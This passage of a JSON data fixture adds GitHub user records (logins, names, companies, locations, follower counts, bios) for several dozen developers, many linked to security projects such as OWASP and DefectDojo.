"2017-05-09T09:23:58Z", + "updated_at": "2024-09-02T08:16:15Z", + "node_id": "MDQ6VXNlcjI4NTYwNjAy", + "bio": "Sotware developer at Neodev | Tuba player at Banda Lunda", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2126, + "fields": { + "nest_created_at": "2024-09-12T00:38:02.500Z", + "nest_updated_at": "2024-09-22T09:43:56.961Z", + "name": "", + "login": "fauna654", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/175965380?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-07-18T16:06:21Z", + "updated_at": "2024-08-26T07:26:56Z", + "node_id": "U_kgDOCn0ExA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2127, + "fields": { + "nest_created_at": "2024-09-12T00:41:56.790Z", + "nest_updated_at": "2024-09-22T19:43:52.033Z", + "name": "Jannik Steinmann", + "login": "DerGut", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12832754?v=4", + "company": "@DataDog", + "location": "Berlin", + "collaborators_count": 0, + "following_count": 19, + "followers_count": 15, + "public_gists_count": 3, + "public_repositories_count": 39, + "created_at": "2015-06-10T16:08:37Z", + "updated_at": "2024-09-18T20:56:52Z", + "node_id": "MDQ6VXNlcjEyODMyNzU0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2128, + "fields": { + "nest_created_at": "2024-09-12T00:41:59.659Z", + "nest_updated_at": "2024-09-22T19:43:56.296Z", + "name": "hx", + "login": "skandix", + "email": "skandix@datapor.no", + "avatar_url": "https://avatars.githubusercontent.com/u/2757177?v=4", + "company": "@uiano", + "location": "", + "collaborators_count": 0, + "following_count": 389, + "followers_count": 119, + "public_gists_count": 6, + "public_repositories_count": 28, + "created_at": "2012-11-09T07:51:10Z", + "updated_at": "2024-09-21T09:23:11Z", + "node_id": "MDQ6VXNlcjI3NTcxNzc=", + "bio": "Living in a Paradoxical level-crossing feedback loop. 🏳️‍🌈\r\n\r\nStaff Engineer @uiano \r\nfreelance audio tech", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2129, + "fields": { + "nest_created_at": "2024-09-12T00:42:01.817Z", + "nest_updated_at": "2024-09-22T20:25:36.596Z", + "name": "Robin Wood", + "login": "digininja", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/117081?v=4", + "company": "", + "location": "UK", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1274, + "public_gists_count": 13, + "public_repositories_count": 60, + "created_at": "2009-08-19T15:17:18Z", + "updated_at": "2024-03-08T11:14:46Z", + "node_id": "MDQ6VXNlcjExNzA4MQ==", + "bio": "Hacker, coder, climber, runner. Co-founder of the SteelCon conference.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2130, + "fields": { + "nest_created_at": "2024-09-12T00:42:02.635Z", + "nest_updated_at": "2024-09-22T19:43:58.516Z", + "name": "", + "login": "jvmdc", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/109624469?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2022-07-19T19:03:29Z", + "updated_at": "2024-09-19T07:35:36Z", + "node_id": "U_kgDOBoi8lQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2131, + "fields": { + "nest_created_at": "2024-09-12T00:42:03.512Z", + "nest_updated_at": "2024-09-13T05:07:42.999Z", + "name": "Nicolò Picasso", + "login": "nicolopicasso", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/110613903?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2022-08-04T13:38:02Z", + "updated_at": "2023-12-06T16:39:08Z", + "node_id": "U_kgDOBpfVjw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2132, + "fields": { + "nest_created_at": "2024-09-12T00:42:05.589Z", + "nest_updated_at": "2024-09-12T00:42:05.589Z", + "name": "Ak", + "login": "Ak-wa", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/44728139?v=4", + "company": "", + "location": "Germany", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 26, + "public_gists_count": 1, + "public_repositories_count": 33, + "created_at": "2018-11-03T14:24:35Z", + "updated_at": "2024-05-10T07:02:21Z", + "node_id": "MDQ6VXNlcjQ0NzI4MTM5", + "bio": "Penetration Tester | OSCP eCPPT certified\r\nツ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2133, + "fields": { + "nest_created_at": "2024-09-12T00:42:06.819Z", + "nest_updated_at": "2024-09-12T00:42:06.819Z", + "name": "", + "login": "bastien-reinhardt", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11425000?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2015-03-11T13:50:02Z", + "updated_at": "2024-05-31T08:00:12Z", + "node_id": "MDQ6VXNlcjExNDI1MDAw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2134, + "fields": { + "nest_created_at": "2024-09-12T00:42:08.131Z", + "nest_updated_at": "2024-09-22T19:43:54.363Z", + "name": "", + "login": "stuebingerb", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/41049452?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 10, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2018-07-10T08:10:22Z", + "updated_at": "2024-09-15T18:18:25Z", + "node_id": "MDQ6VXNlcjQxMDQ5NDUy", + "bio": "Certified Rockstar Developer\r\nhttps://codewithrockstar.com/", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2135, + "fields": { + "nest_created_at": "2024-09-12T01:08:08.819Z", + "nest_updated_at": "2024-09-12T01:08:08.819Z", + "name": "", + "login": "mpp-anasa", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/38040056?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2018-04-03T12:32:46Z", + "updated_at": "2021-07-21T13:26:51Z", + "node_id": "MDQ6VXNlcjM4MDQwMDU2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2136, + "fields": { + "nest_created_at": "2024-09-12T01:08:13.237Z", + "nest_updated_at": "2024-09-22T19:31:08.795Z", + "name": "Marco Ochse", + "login": "t3chn0m4g3", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4318452?v=4", + "company": "Telekom Security | Honeynet Project", + "location": "Frankfurt", + "collaborators_count": 0, + "following_count": 35, + "followers_count": 203, + "public_gists_count": 5, + "public_repositories_count": 84, + "created_at": "2013-05-02T06:05:26Z", + "updated_at": "2024-09-05T09:09:44Z", + "node_id": "MDQ6VXNlcjQzMTg0NTI=", + "bio": "@telekom-security \r\n@honeynet ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2137, + "fields": { + "nest_created_at": "2024-09-12T01:08:14.938Z", + "nest_updated_at": "2024-09-22T19:30:51.461Z", + "name": "", + "login": "EdilsonGalvao", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7414435?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2014-04-26T14:59:33Z", + "updated_at": "2024-08-09T11:58:46Z", + "node_id": "MDQ6VXNlcjc0MTQ0MzU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2138, + "fields": { + "nest_created_at": "2024-09-12T01:08:15.742Z", + "nest_updated_at": "2024-09-12T01:08:15.742Z", + "name": "Jordan Bondo", + "login": "faithfracture", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/717745?v=4", + "company": "OpenEye", + "location": "Cheney, WA", + "collaborators_count": 0, + "following_count": 12, + "followers_count": 18, + "public_gists_count": 1, + "public_repositories_count": 17, + "created_at": "2011-04-08T15:37:42Z", + "updated_at": "2024-08-28T11:21:48Z", + "node_id": "MDQ6VXNlcjcxNzc0NQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2139, + "fields": { + "nest_created_at": "2024-09-12T01:08:17.440Z", + "nest_updated_at": "2024-09-12T01:08:17.440Z", + "name": "", + "login": "JenniferLaCroix", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/138414986?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 29, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-07-03T01:40:16Z", + "updated_at": "2024-08-22T10:57:22Z", + "node_id": "U_kgDOCEALig", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2140, + "fields": { + "nest_created_at": "2024-09-12T01:08:18.262Z", + "nest_updated_at": "2024-09-12T01:08:18.262Z", + "name": "Jerimiah Rasmussen", + "login": "Myahr208", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/135060040?v=4", + "company": "Green Collars ", + "location": "", + "collaborators_count": 0, + "following_count": 75, + "followers_count": 48, + "public_gists_count": 2, + "public_repositories_count": 52, + "created_at": "2023-05-30T18:28:50Z", + "updated_at": "2024-09-08T22:14:00Z", + "node_id": "U_kgDOCAzaSA", + "bio": "Green Collars ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2141, + "fields": { + "nest_created_at": "2024-09-12T01:08:20.813Z", + "nest_updated_at": "2024-09-22T19:32:19.139Z", + "name": "Code Dx", + "login": "codedx", + "email": "sig-codedx-github@synopsys.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6878202?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 13, + "public_gists_count": 0, + "public_repositories_count": 38, + "created_at": "2014-03-06T23:32:41Z", + "updated_at": "2024-09-04T22:07:59Z", + "node_id": "MDEyOk9yZ2FuaXphdGlvbjY4NzgyMDI=", + "bio": "Code Dx is focused on helping developers build and launch applications that can safely brave the hazardous waters of the internet", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2142, + "fields": { + "nest_created_at": "2024-09-12T01:08:24.054Z", + "nest_updated_at": "2024-09-12T02:40:10.554Z", + "name": "", + "login": "skirge", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/213444?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 221, + "followers_count": 11, + "public_gists_count": 2, + "public_repositories_count": 58, + "created_at": "2010-03-01T20:52:50Z", + "updated_at": "2024-09-10T11:46:27Z", + "node_id": "MDQ6VXNlcjIxMzQ0NA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2143, + "fields": { + "nest_created_at": "2024-09-12T01:08:25.343Z", + "nest_updated_at": "2024-09-12T01:08:25.343Z", + "name": "", + "login": "deven1rao", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/115809122?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-10-14T15:41:02Z", + "updated_at": "2022-10-25T11:05:19Z", + "node_id": "U_kgDOBucbYg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2144, + "fields": { + "nest_created_at": "2024-09-12T01:08:26.192Z", + "nest_updated_at": "2024-09-22T19:32:21.758Z", + "name": "", + "login": "Babu420-Bhaiya", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/71264555?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2020-09-14T11:32:55Z", + "updated_at": "2023-08-28T11:50:05Z", + "node_id": "MDQ6VXNlcjcxMjY0NTU1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2145, + "fields": { + "nest_created_at": "2024-09-12T01:08:27.586Z", + "nest_updated_at": "2024-09-22T19:32:24.553Z", + "name": "", + "login": "stevesalas", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/29252545?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2017-06-07T11:35:36Z", + "updated_at": "2024-08-09T15:40:11Z", + "node_id": "MDQ6VXNlcjI5MjUyNTQ1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2146, + "fields": { + "nest_created_at": "2024-09-12T01:08:33.995Z", + "nest_updated_at": "2024-09-22T19:32:23.278Z", + "name": "Bobby Ferris", + "login": "baffles", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3181103?v=4", + "company": "", + "location": "New York", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 27, + "public_gists_count": 1, + "public_repositories_count": 34, + "created_at": "2013-01-03T23:10:26Z", + "updated_at": "2024-09-19T18:42:45Z", + "node_id": "MDQ6VXNlcjMxODExMDM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2147, + "fields": { + "nest_created_at": "2024-09-12T01:08:35.707Z", + "nest_updated_at": "2024-09-22T19:32:23.914Z", + "name": "Hassan Radwan", + "login": "leRadwan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2379469?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2012-09-19T16:22:07Z", + "updated_at": "2024-07-15T16:38:11Z", + "node_id": "MDQ6VXNlcjIzNzk0Njk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2148, + "fields": { + "nest_created_at": "2024-09-12T01:08:42.445Z", + "nest_updated_at": "2024-09-22T19:42:31.294Z", + "name": "Sam Li", + "login": "yangsec888", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3275355?v=4", + "company": "OWASP", + "location": "Florida, USA", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2013-01-15T13:17:15Z", + "updated_at": "2024-08-23T13:36:31Z", + "node_id": "MDQ6VXNlcjMyNzUzNTU=", + "bio": "Security monkey; jack of all trades ...", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2149, + "fields": { + "nest_created_at": "2024-09-12T01:08:54.328Z", + "nest_updated_at": "2024-09-22T19:38:34.748Z", + "name": "DefectDojo", + "login": "DefectDojo", + "email": "info@defectdojo.com", + "avatar_url": "https://avatars.githubusercontent.com/u/35606478?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 143, + "public_gists_count": 0, + "public_repositories_count": 25, + "created_at": "2018-01-19T16:22:27Z", + "updated_at": "2024-02-26T02:25:06Z", + "node_id": "MDEyOk9yZ2FuaXphdGlvbjM1NjA2NDc4", + "bio": "Open Source DevSecOps, ASPM & Vulnerability Management.", + "is_hireable": false, + "twitter_username": "defectdojo" + } +}, +{ + "model": "github.user", + "pk": 2150, + "fields": { + "nest_created_at": "2024-09-12T01:09:13.941Z", + "nest_updated_at": "2024-09-22T19:38:37.892Z", + "name": "Cody Maffucci", + "login": "Maffooch", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/46459665?v=4", + "company": "@DefectDojo-Inc ", + "location": "Cypress, TX", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 17, + "public_gists_count": 2, + "public_repositories_count": 6, + "created_at": "2019-01-07T20:07:01Z", + "updated_at": "2024-09-06T22:08:02Z", + "node_id": "MDQ6VXNlcjQ2NDU5NjY1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2151, + "fields": { + "nest_created_at": "2024-09-12T01:09:26.616Z", + "nest_updated_at": "2024-09-22T19:35:58.917Z", + "name": "Raghu", + "login": "raghunath24", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/38399884?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 12, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2018-04-15T12:57:20Z", + "updated_at": "2019-09-23T06:25:15Z", + "node_id": "MDQ6VXNlcjM4Mzk5ODg0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2152, + "fields": { + "nest_created_at": "2024-09-12T01:09:28.286Z", + "nest_updated_at": "2024-09-12T01:09:28.286Z", + "name": "", + "login": "sirferl", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/41906265?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2018-07-30T12:36:17Z", + "updated_at": "2022-11-23T07:39:31Z", + "node_id": "MDQ6VXNlcjQxOTA2MjY1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2153, + "fields": { + "nest_created_at": "2024-09-12T01:09:29.107Z", + "nest_updated_at": "2024-09-12T01:09:29.107Z", + "name": "", + "login": "heepspray", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/43822156?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2018-10-03T16:08:52Z", + "updated_at": "2019-03-01T12:42:55Z", + "node_id": "MDQ6VXNlcjQzODIyMTU2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2154, + "fields": { + "nest_created_at": "2024-09-12T01:09:29.960Z", + "nest_updated_at": "2024-09-12T01:09:29.960Z", + "name": "Pedro Galindo", + "login": "p3r1c0", + "email": "p3r1c0labs@outlook.es", + "avatar_url": "https://avatars.githubusercontent.com/u/19948149?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 27, + "created_at": "2016-06-15T08:56:22Z", + "updated_at": "2024-07-31T12:48:36Z", + "node_id": "MDQ6VXNlcjE5OTQ4MTQ5", + "bio": "share&learn&enjoy", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2155, + "fields": { + "nest_created_at": "2024-09-12T01:09:30.785Z", + "nest_updated_at": "2024-09-22T19:38:12.943Z", + "name": "", + "login": "barbich", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1044555?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 15, + "created_at": "2011-09-12T14:16:29Z", + "updated_at": "2024-09-14T06:50:13Z", + "node_id": "MDQ6VXNlcjEwNDQ1NTU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2156, + "fields": { + "nest_created_at": "2024-09-12T01:09:32.496Z", + "nest_updated_at": "2024-09-12T01:09:32.496Z", + "name": "Michal Wiczynski", + "login": "wheelq", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1497172?v=4", + "company": "", + "location": "United Kingdom", + "collaborators_count": 0, + "following_count": 60, + "followers_count": 12, + "public_gists_count": 70, + "public_repositories_count": 245, + "created_at": "2012-03-03T18:00:54Z", + "updated_at": "2024-08-20T11:23:15Z", + "node_id": "MDQ6VXNlcjE0OTcxNzI=", + "bio": "Dev(Sec)Ops\r\n\r\nGists: https://gist.github.com/wheelq", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2157, + "fields": { + "nest_created_at": "2024-09-12T01:09:33.372Z", + "nest_updated_at": "2024-09-12T01:09:33.372Z", + "name": "Cyril Levis", + "login": "cyrinux", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/519083?v=4", + "company": "Dailymotion", + "location": "Internet", + "collaborators_count": 0, + "following_count": 243, + "followers_count": 64, + "public_gists_count": 11, + "public_repositories_count": 280, + "created_at": "2010-12-11T15:11:17Z", + "updated_at": "2024-09-02T19:57:22Z", + "node_id": "MDQ6VXNlcjUxOTA4Mw==", + "bio": "0x6A11D19BDD5F8B5E | IT, Hacker", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2158, + "fields": { + "nest_created_at": "2024-09-12T01:09:35.455Z", + "nest_updated_at": "2024-09-12T01:09:35.455Z", + "name": "", + "login": "Al192168", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/55237421?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2019-09-12T10:46:17Z", + "updated_at": "2020-01-08T16:29:28Z", + "node_id": "MDQ6VXNlcjU1MjM3NDIx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2159, + "fields": { + "nest_created_at": "2024-09-12T01:09:36.303Z", + "nest_updated_at": "2024-09-12T01:09:36.303Z", + "name": "Kondal", + "login": "tkr6743", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/38727383?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2018-04-25T13:50:43Z", + "updated_at": "2022-04-11T06:19:06Z", + "node_id": "MDQ6VXNlcjM4NzI3Mzgz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2160, + "fields": { + "nest_created_at": "2024-09-12T01:09:37.157Z", + "nest_updated_at": "2024-09-22T19:35:50.822Z", + "name": "Alexander Stein (Inactive)", + "login": "tohch4", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/39844334?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 7, + "public_gists_count": 7, + "public_repositories_count": 106, + "created_at": "2018-06-01T23:42:56Z", + "updated_at": "2024-08-22T21:53:44Z", + "node_id": "MDQ6VXNlcjM5ODQ0MzM0", + "bio": "I am a former employee of Flexion. This account is no longer active as of 5 November 2021.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2161, + "fields": { + "nest_created_at": "2024-09-12T01:09:37.952Z", + "nest_updated_at": "2024-09-22T19:35:24.648Z", + "name": "Ederson Brilhante", + "login": "edersonbrilhante", + "email": "contato@edersonbrilhante.com.br", + "avatar_url": "https://avatars.githubusercontent.com/u/1094995?v=4", + "company": "@cisco", + "location": "Krakow - Poland", + "collaborators_count": 0, + "following_count": 84, + "followers_count": 76, + "public_gists_count": 2, + "public_repositories_count": 44, + "created_at": "2011-10-01T15:17:46Z", + "updated_at": "2024-08-19T10:46:09Z", + "node_id": "MDQ6VXNlcjEwOTQ5OTU=", + "bio": "SRE Tech Lead", + "is_hireable": false, + "twitter_username": "ederbrilhante" + } +}, +{ + "model": "github.user", + "pk": 2162, + "fields": { + "nest_created_at": "2024-09-12T01:09:38.777Z", + "nest_updated_at": "2024-09-12T01:09:38.777Z", + "name": "", + "login": "nbublikov", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/68223804?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2020-07-13T09:44:08Z", + "updated_at": "2022-01-25T21:07:48Z", + "node_id": "MDQ6VXNlcjY4MjIzODA0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2163, + "fields": { + "nest_created_at": "2024-09-12T01:09:39.581Z", + "nest_updated_at": "2024-09-12T01:09:39.581Z", + "name": "", + "login": "vishnupriyaavp8", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/54842012?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-09-03T09:54:15Z", + "updated_at": "2022-02-27T18:48:53Z", + "node_id": "MDQ6VXNlcjU0ODQyMDEy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2164, + "fields": { + "nest_created_at": "2024-09-12T01:09:40.396Z", + "nest_updated_at": "2024-09-12T01:09:40.396Z", + "name": "", + "login": "tungtran01", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/56481784?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2019-10-12T15:07:39Z", + "updated_at": "2023-08-03T18:32:09Z", + "node_id": "MDQ6VXNlcjU2NDgxNzg0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2165, + "fields": { + "nest_created_at": "2024-09-12T01:09:41.226Z", + "nest_updated_at": "2024-09-22T20:22:26.676Z", + "name": "", + "login": "valentijnscholten", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4426050?v=4", + "company": "ISAAC", + "location": "Eindhoven", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 29, + "public_gists_count": 4, + "public_repositories_count": 35, + "created_at": "2013-05-14T09:16:26Z", + "updated_at": "2024-09-17T07:29:10Z", + "node_id": "MDQ6VXNlcjQ0MjYwNTA=", + "bio": "", + "is_hireable": false, + "twitter_username": "valentijn" + } +}, +{ + "model": "github.user", + "pk": 2166, + "fields": { + "nest_created_at": "2024-09-12T01:09:42.056Z", + "nest_updated_at": "2024-09-12T01:09:42.057Z", + "name": "", + "login": "desebjohnston", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/95700859?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2021-12-07T14:58:07Z", + "updated_at": "2024-06-25T13:38:25Z", + "node_id": "U_kgDOBbRHew", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2167, + "fields": { + "nest_created_at": "2024-09-12T01:09:42.864Z", + "nest_updated_at": "2024-09-12T01:15:50.094Z", + "name": "Jordi Sayeras", + "login": "jsayerascb", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/143995941?v=4", + "company": "CloudBees", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-09-04T06:49:15Z", + "updated_at": "2024-07-23T07:59:11Z", + "node_id": "U_kgDOCJU0JQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2168, + "fields": { + "nest_created_at": "2024-09-12T01:09:43.757Z", + "nest_updated_at": "2024-09-13T05:10:00.458Z", + "name": "", + "login": "resphantom", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/78911523?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2021-02-11T12:32:55Z", + "updated_at": "2024-02-24T09:14:13Z", + "node_id": "MDQ6VXNlcjc4OTExNTIz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2169, + "fields": { + "nest_created_at": "2024-09-12T01:09:45.158Z", + "nest_updated_at": "2024-09-22T19:38:11.345Z", + "name": "Aaron Weaver", + "login": "aaronweaver", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/220838?v=4", + "company": "OWASP", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 59, + "public_gists_count": 3, + "public_repositories_count": 36, + "created_at": "2010-03-11T19:54:19Z", + "updated_at": "2024-09-16T11:24:04Z", + "node_id": "MDQ6VXNlcjIyMDgzOA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2170, + "fields": { + "nest_created_at": "2024-09-12T01:10:20.573Z", + "nest_updated_at": "2024-09-22T19:37:54.012Z", + "name": "Stefan Fleckenstein", + "login": "StefanFl", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2698502?v=4", + "company": "MaibornWolff GmbH", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2012-11-01T11:57:52Z", + "updated_at": "2024-09-21T21:26:41Z", + "node_id": "MDQ6VXNlcjI2OTg1MDI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2171, + "fields": { + "nest_created_at": "2024-09-12T01:10:21.798Z", + "nest_updated_at": 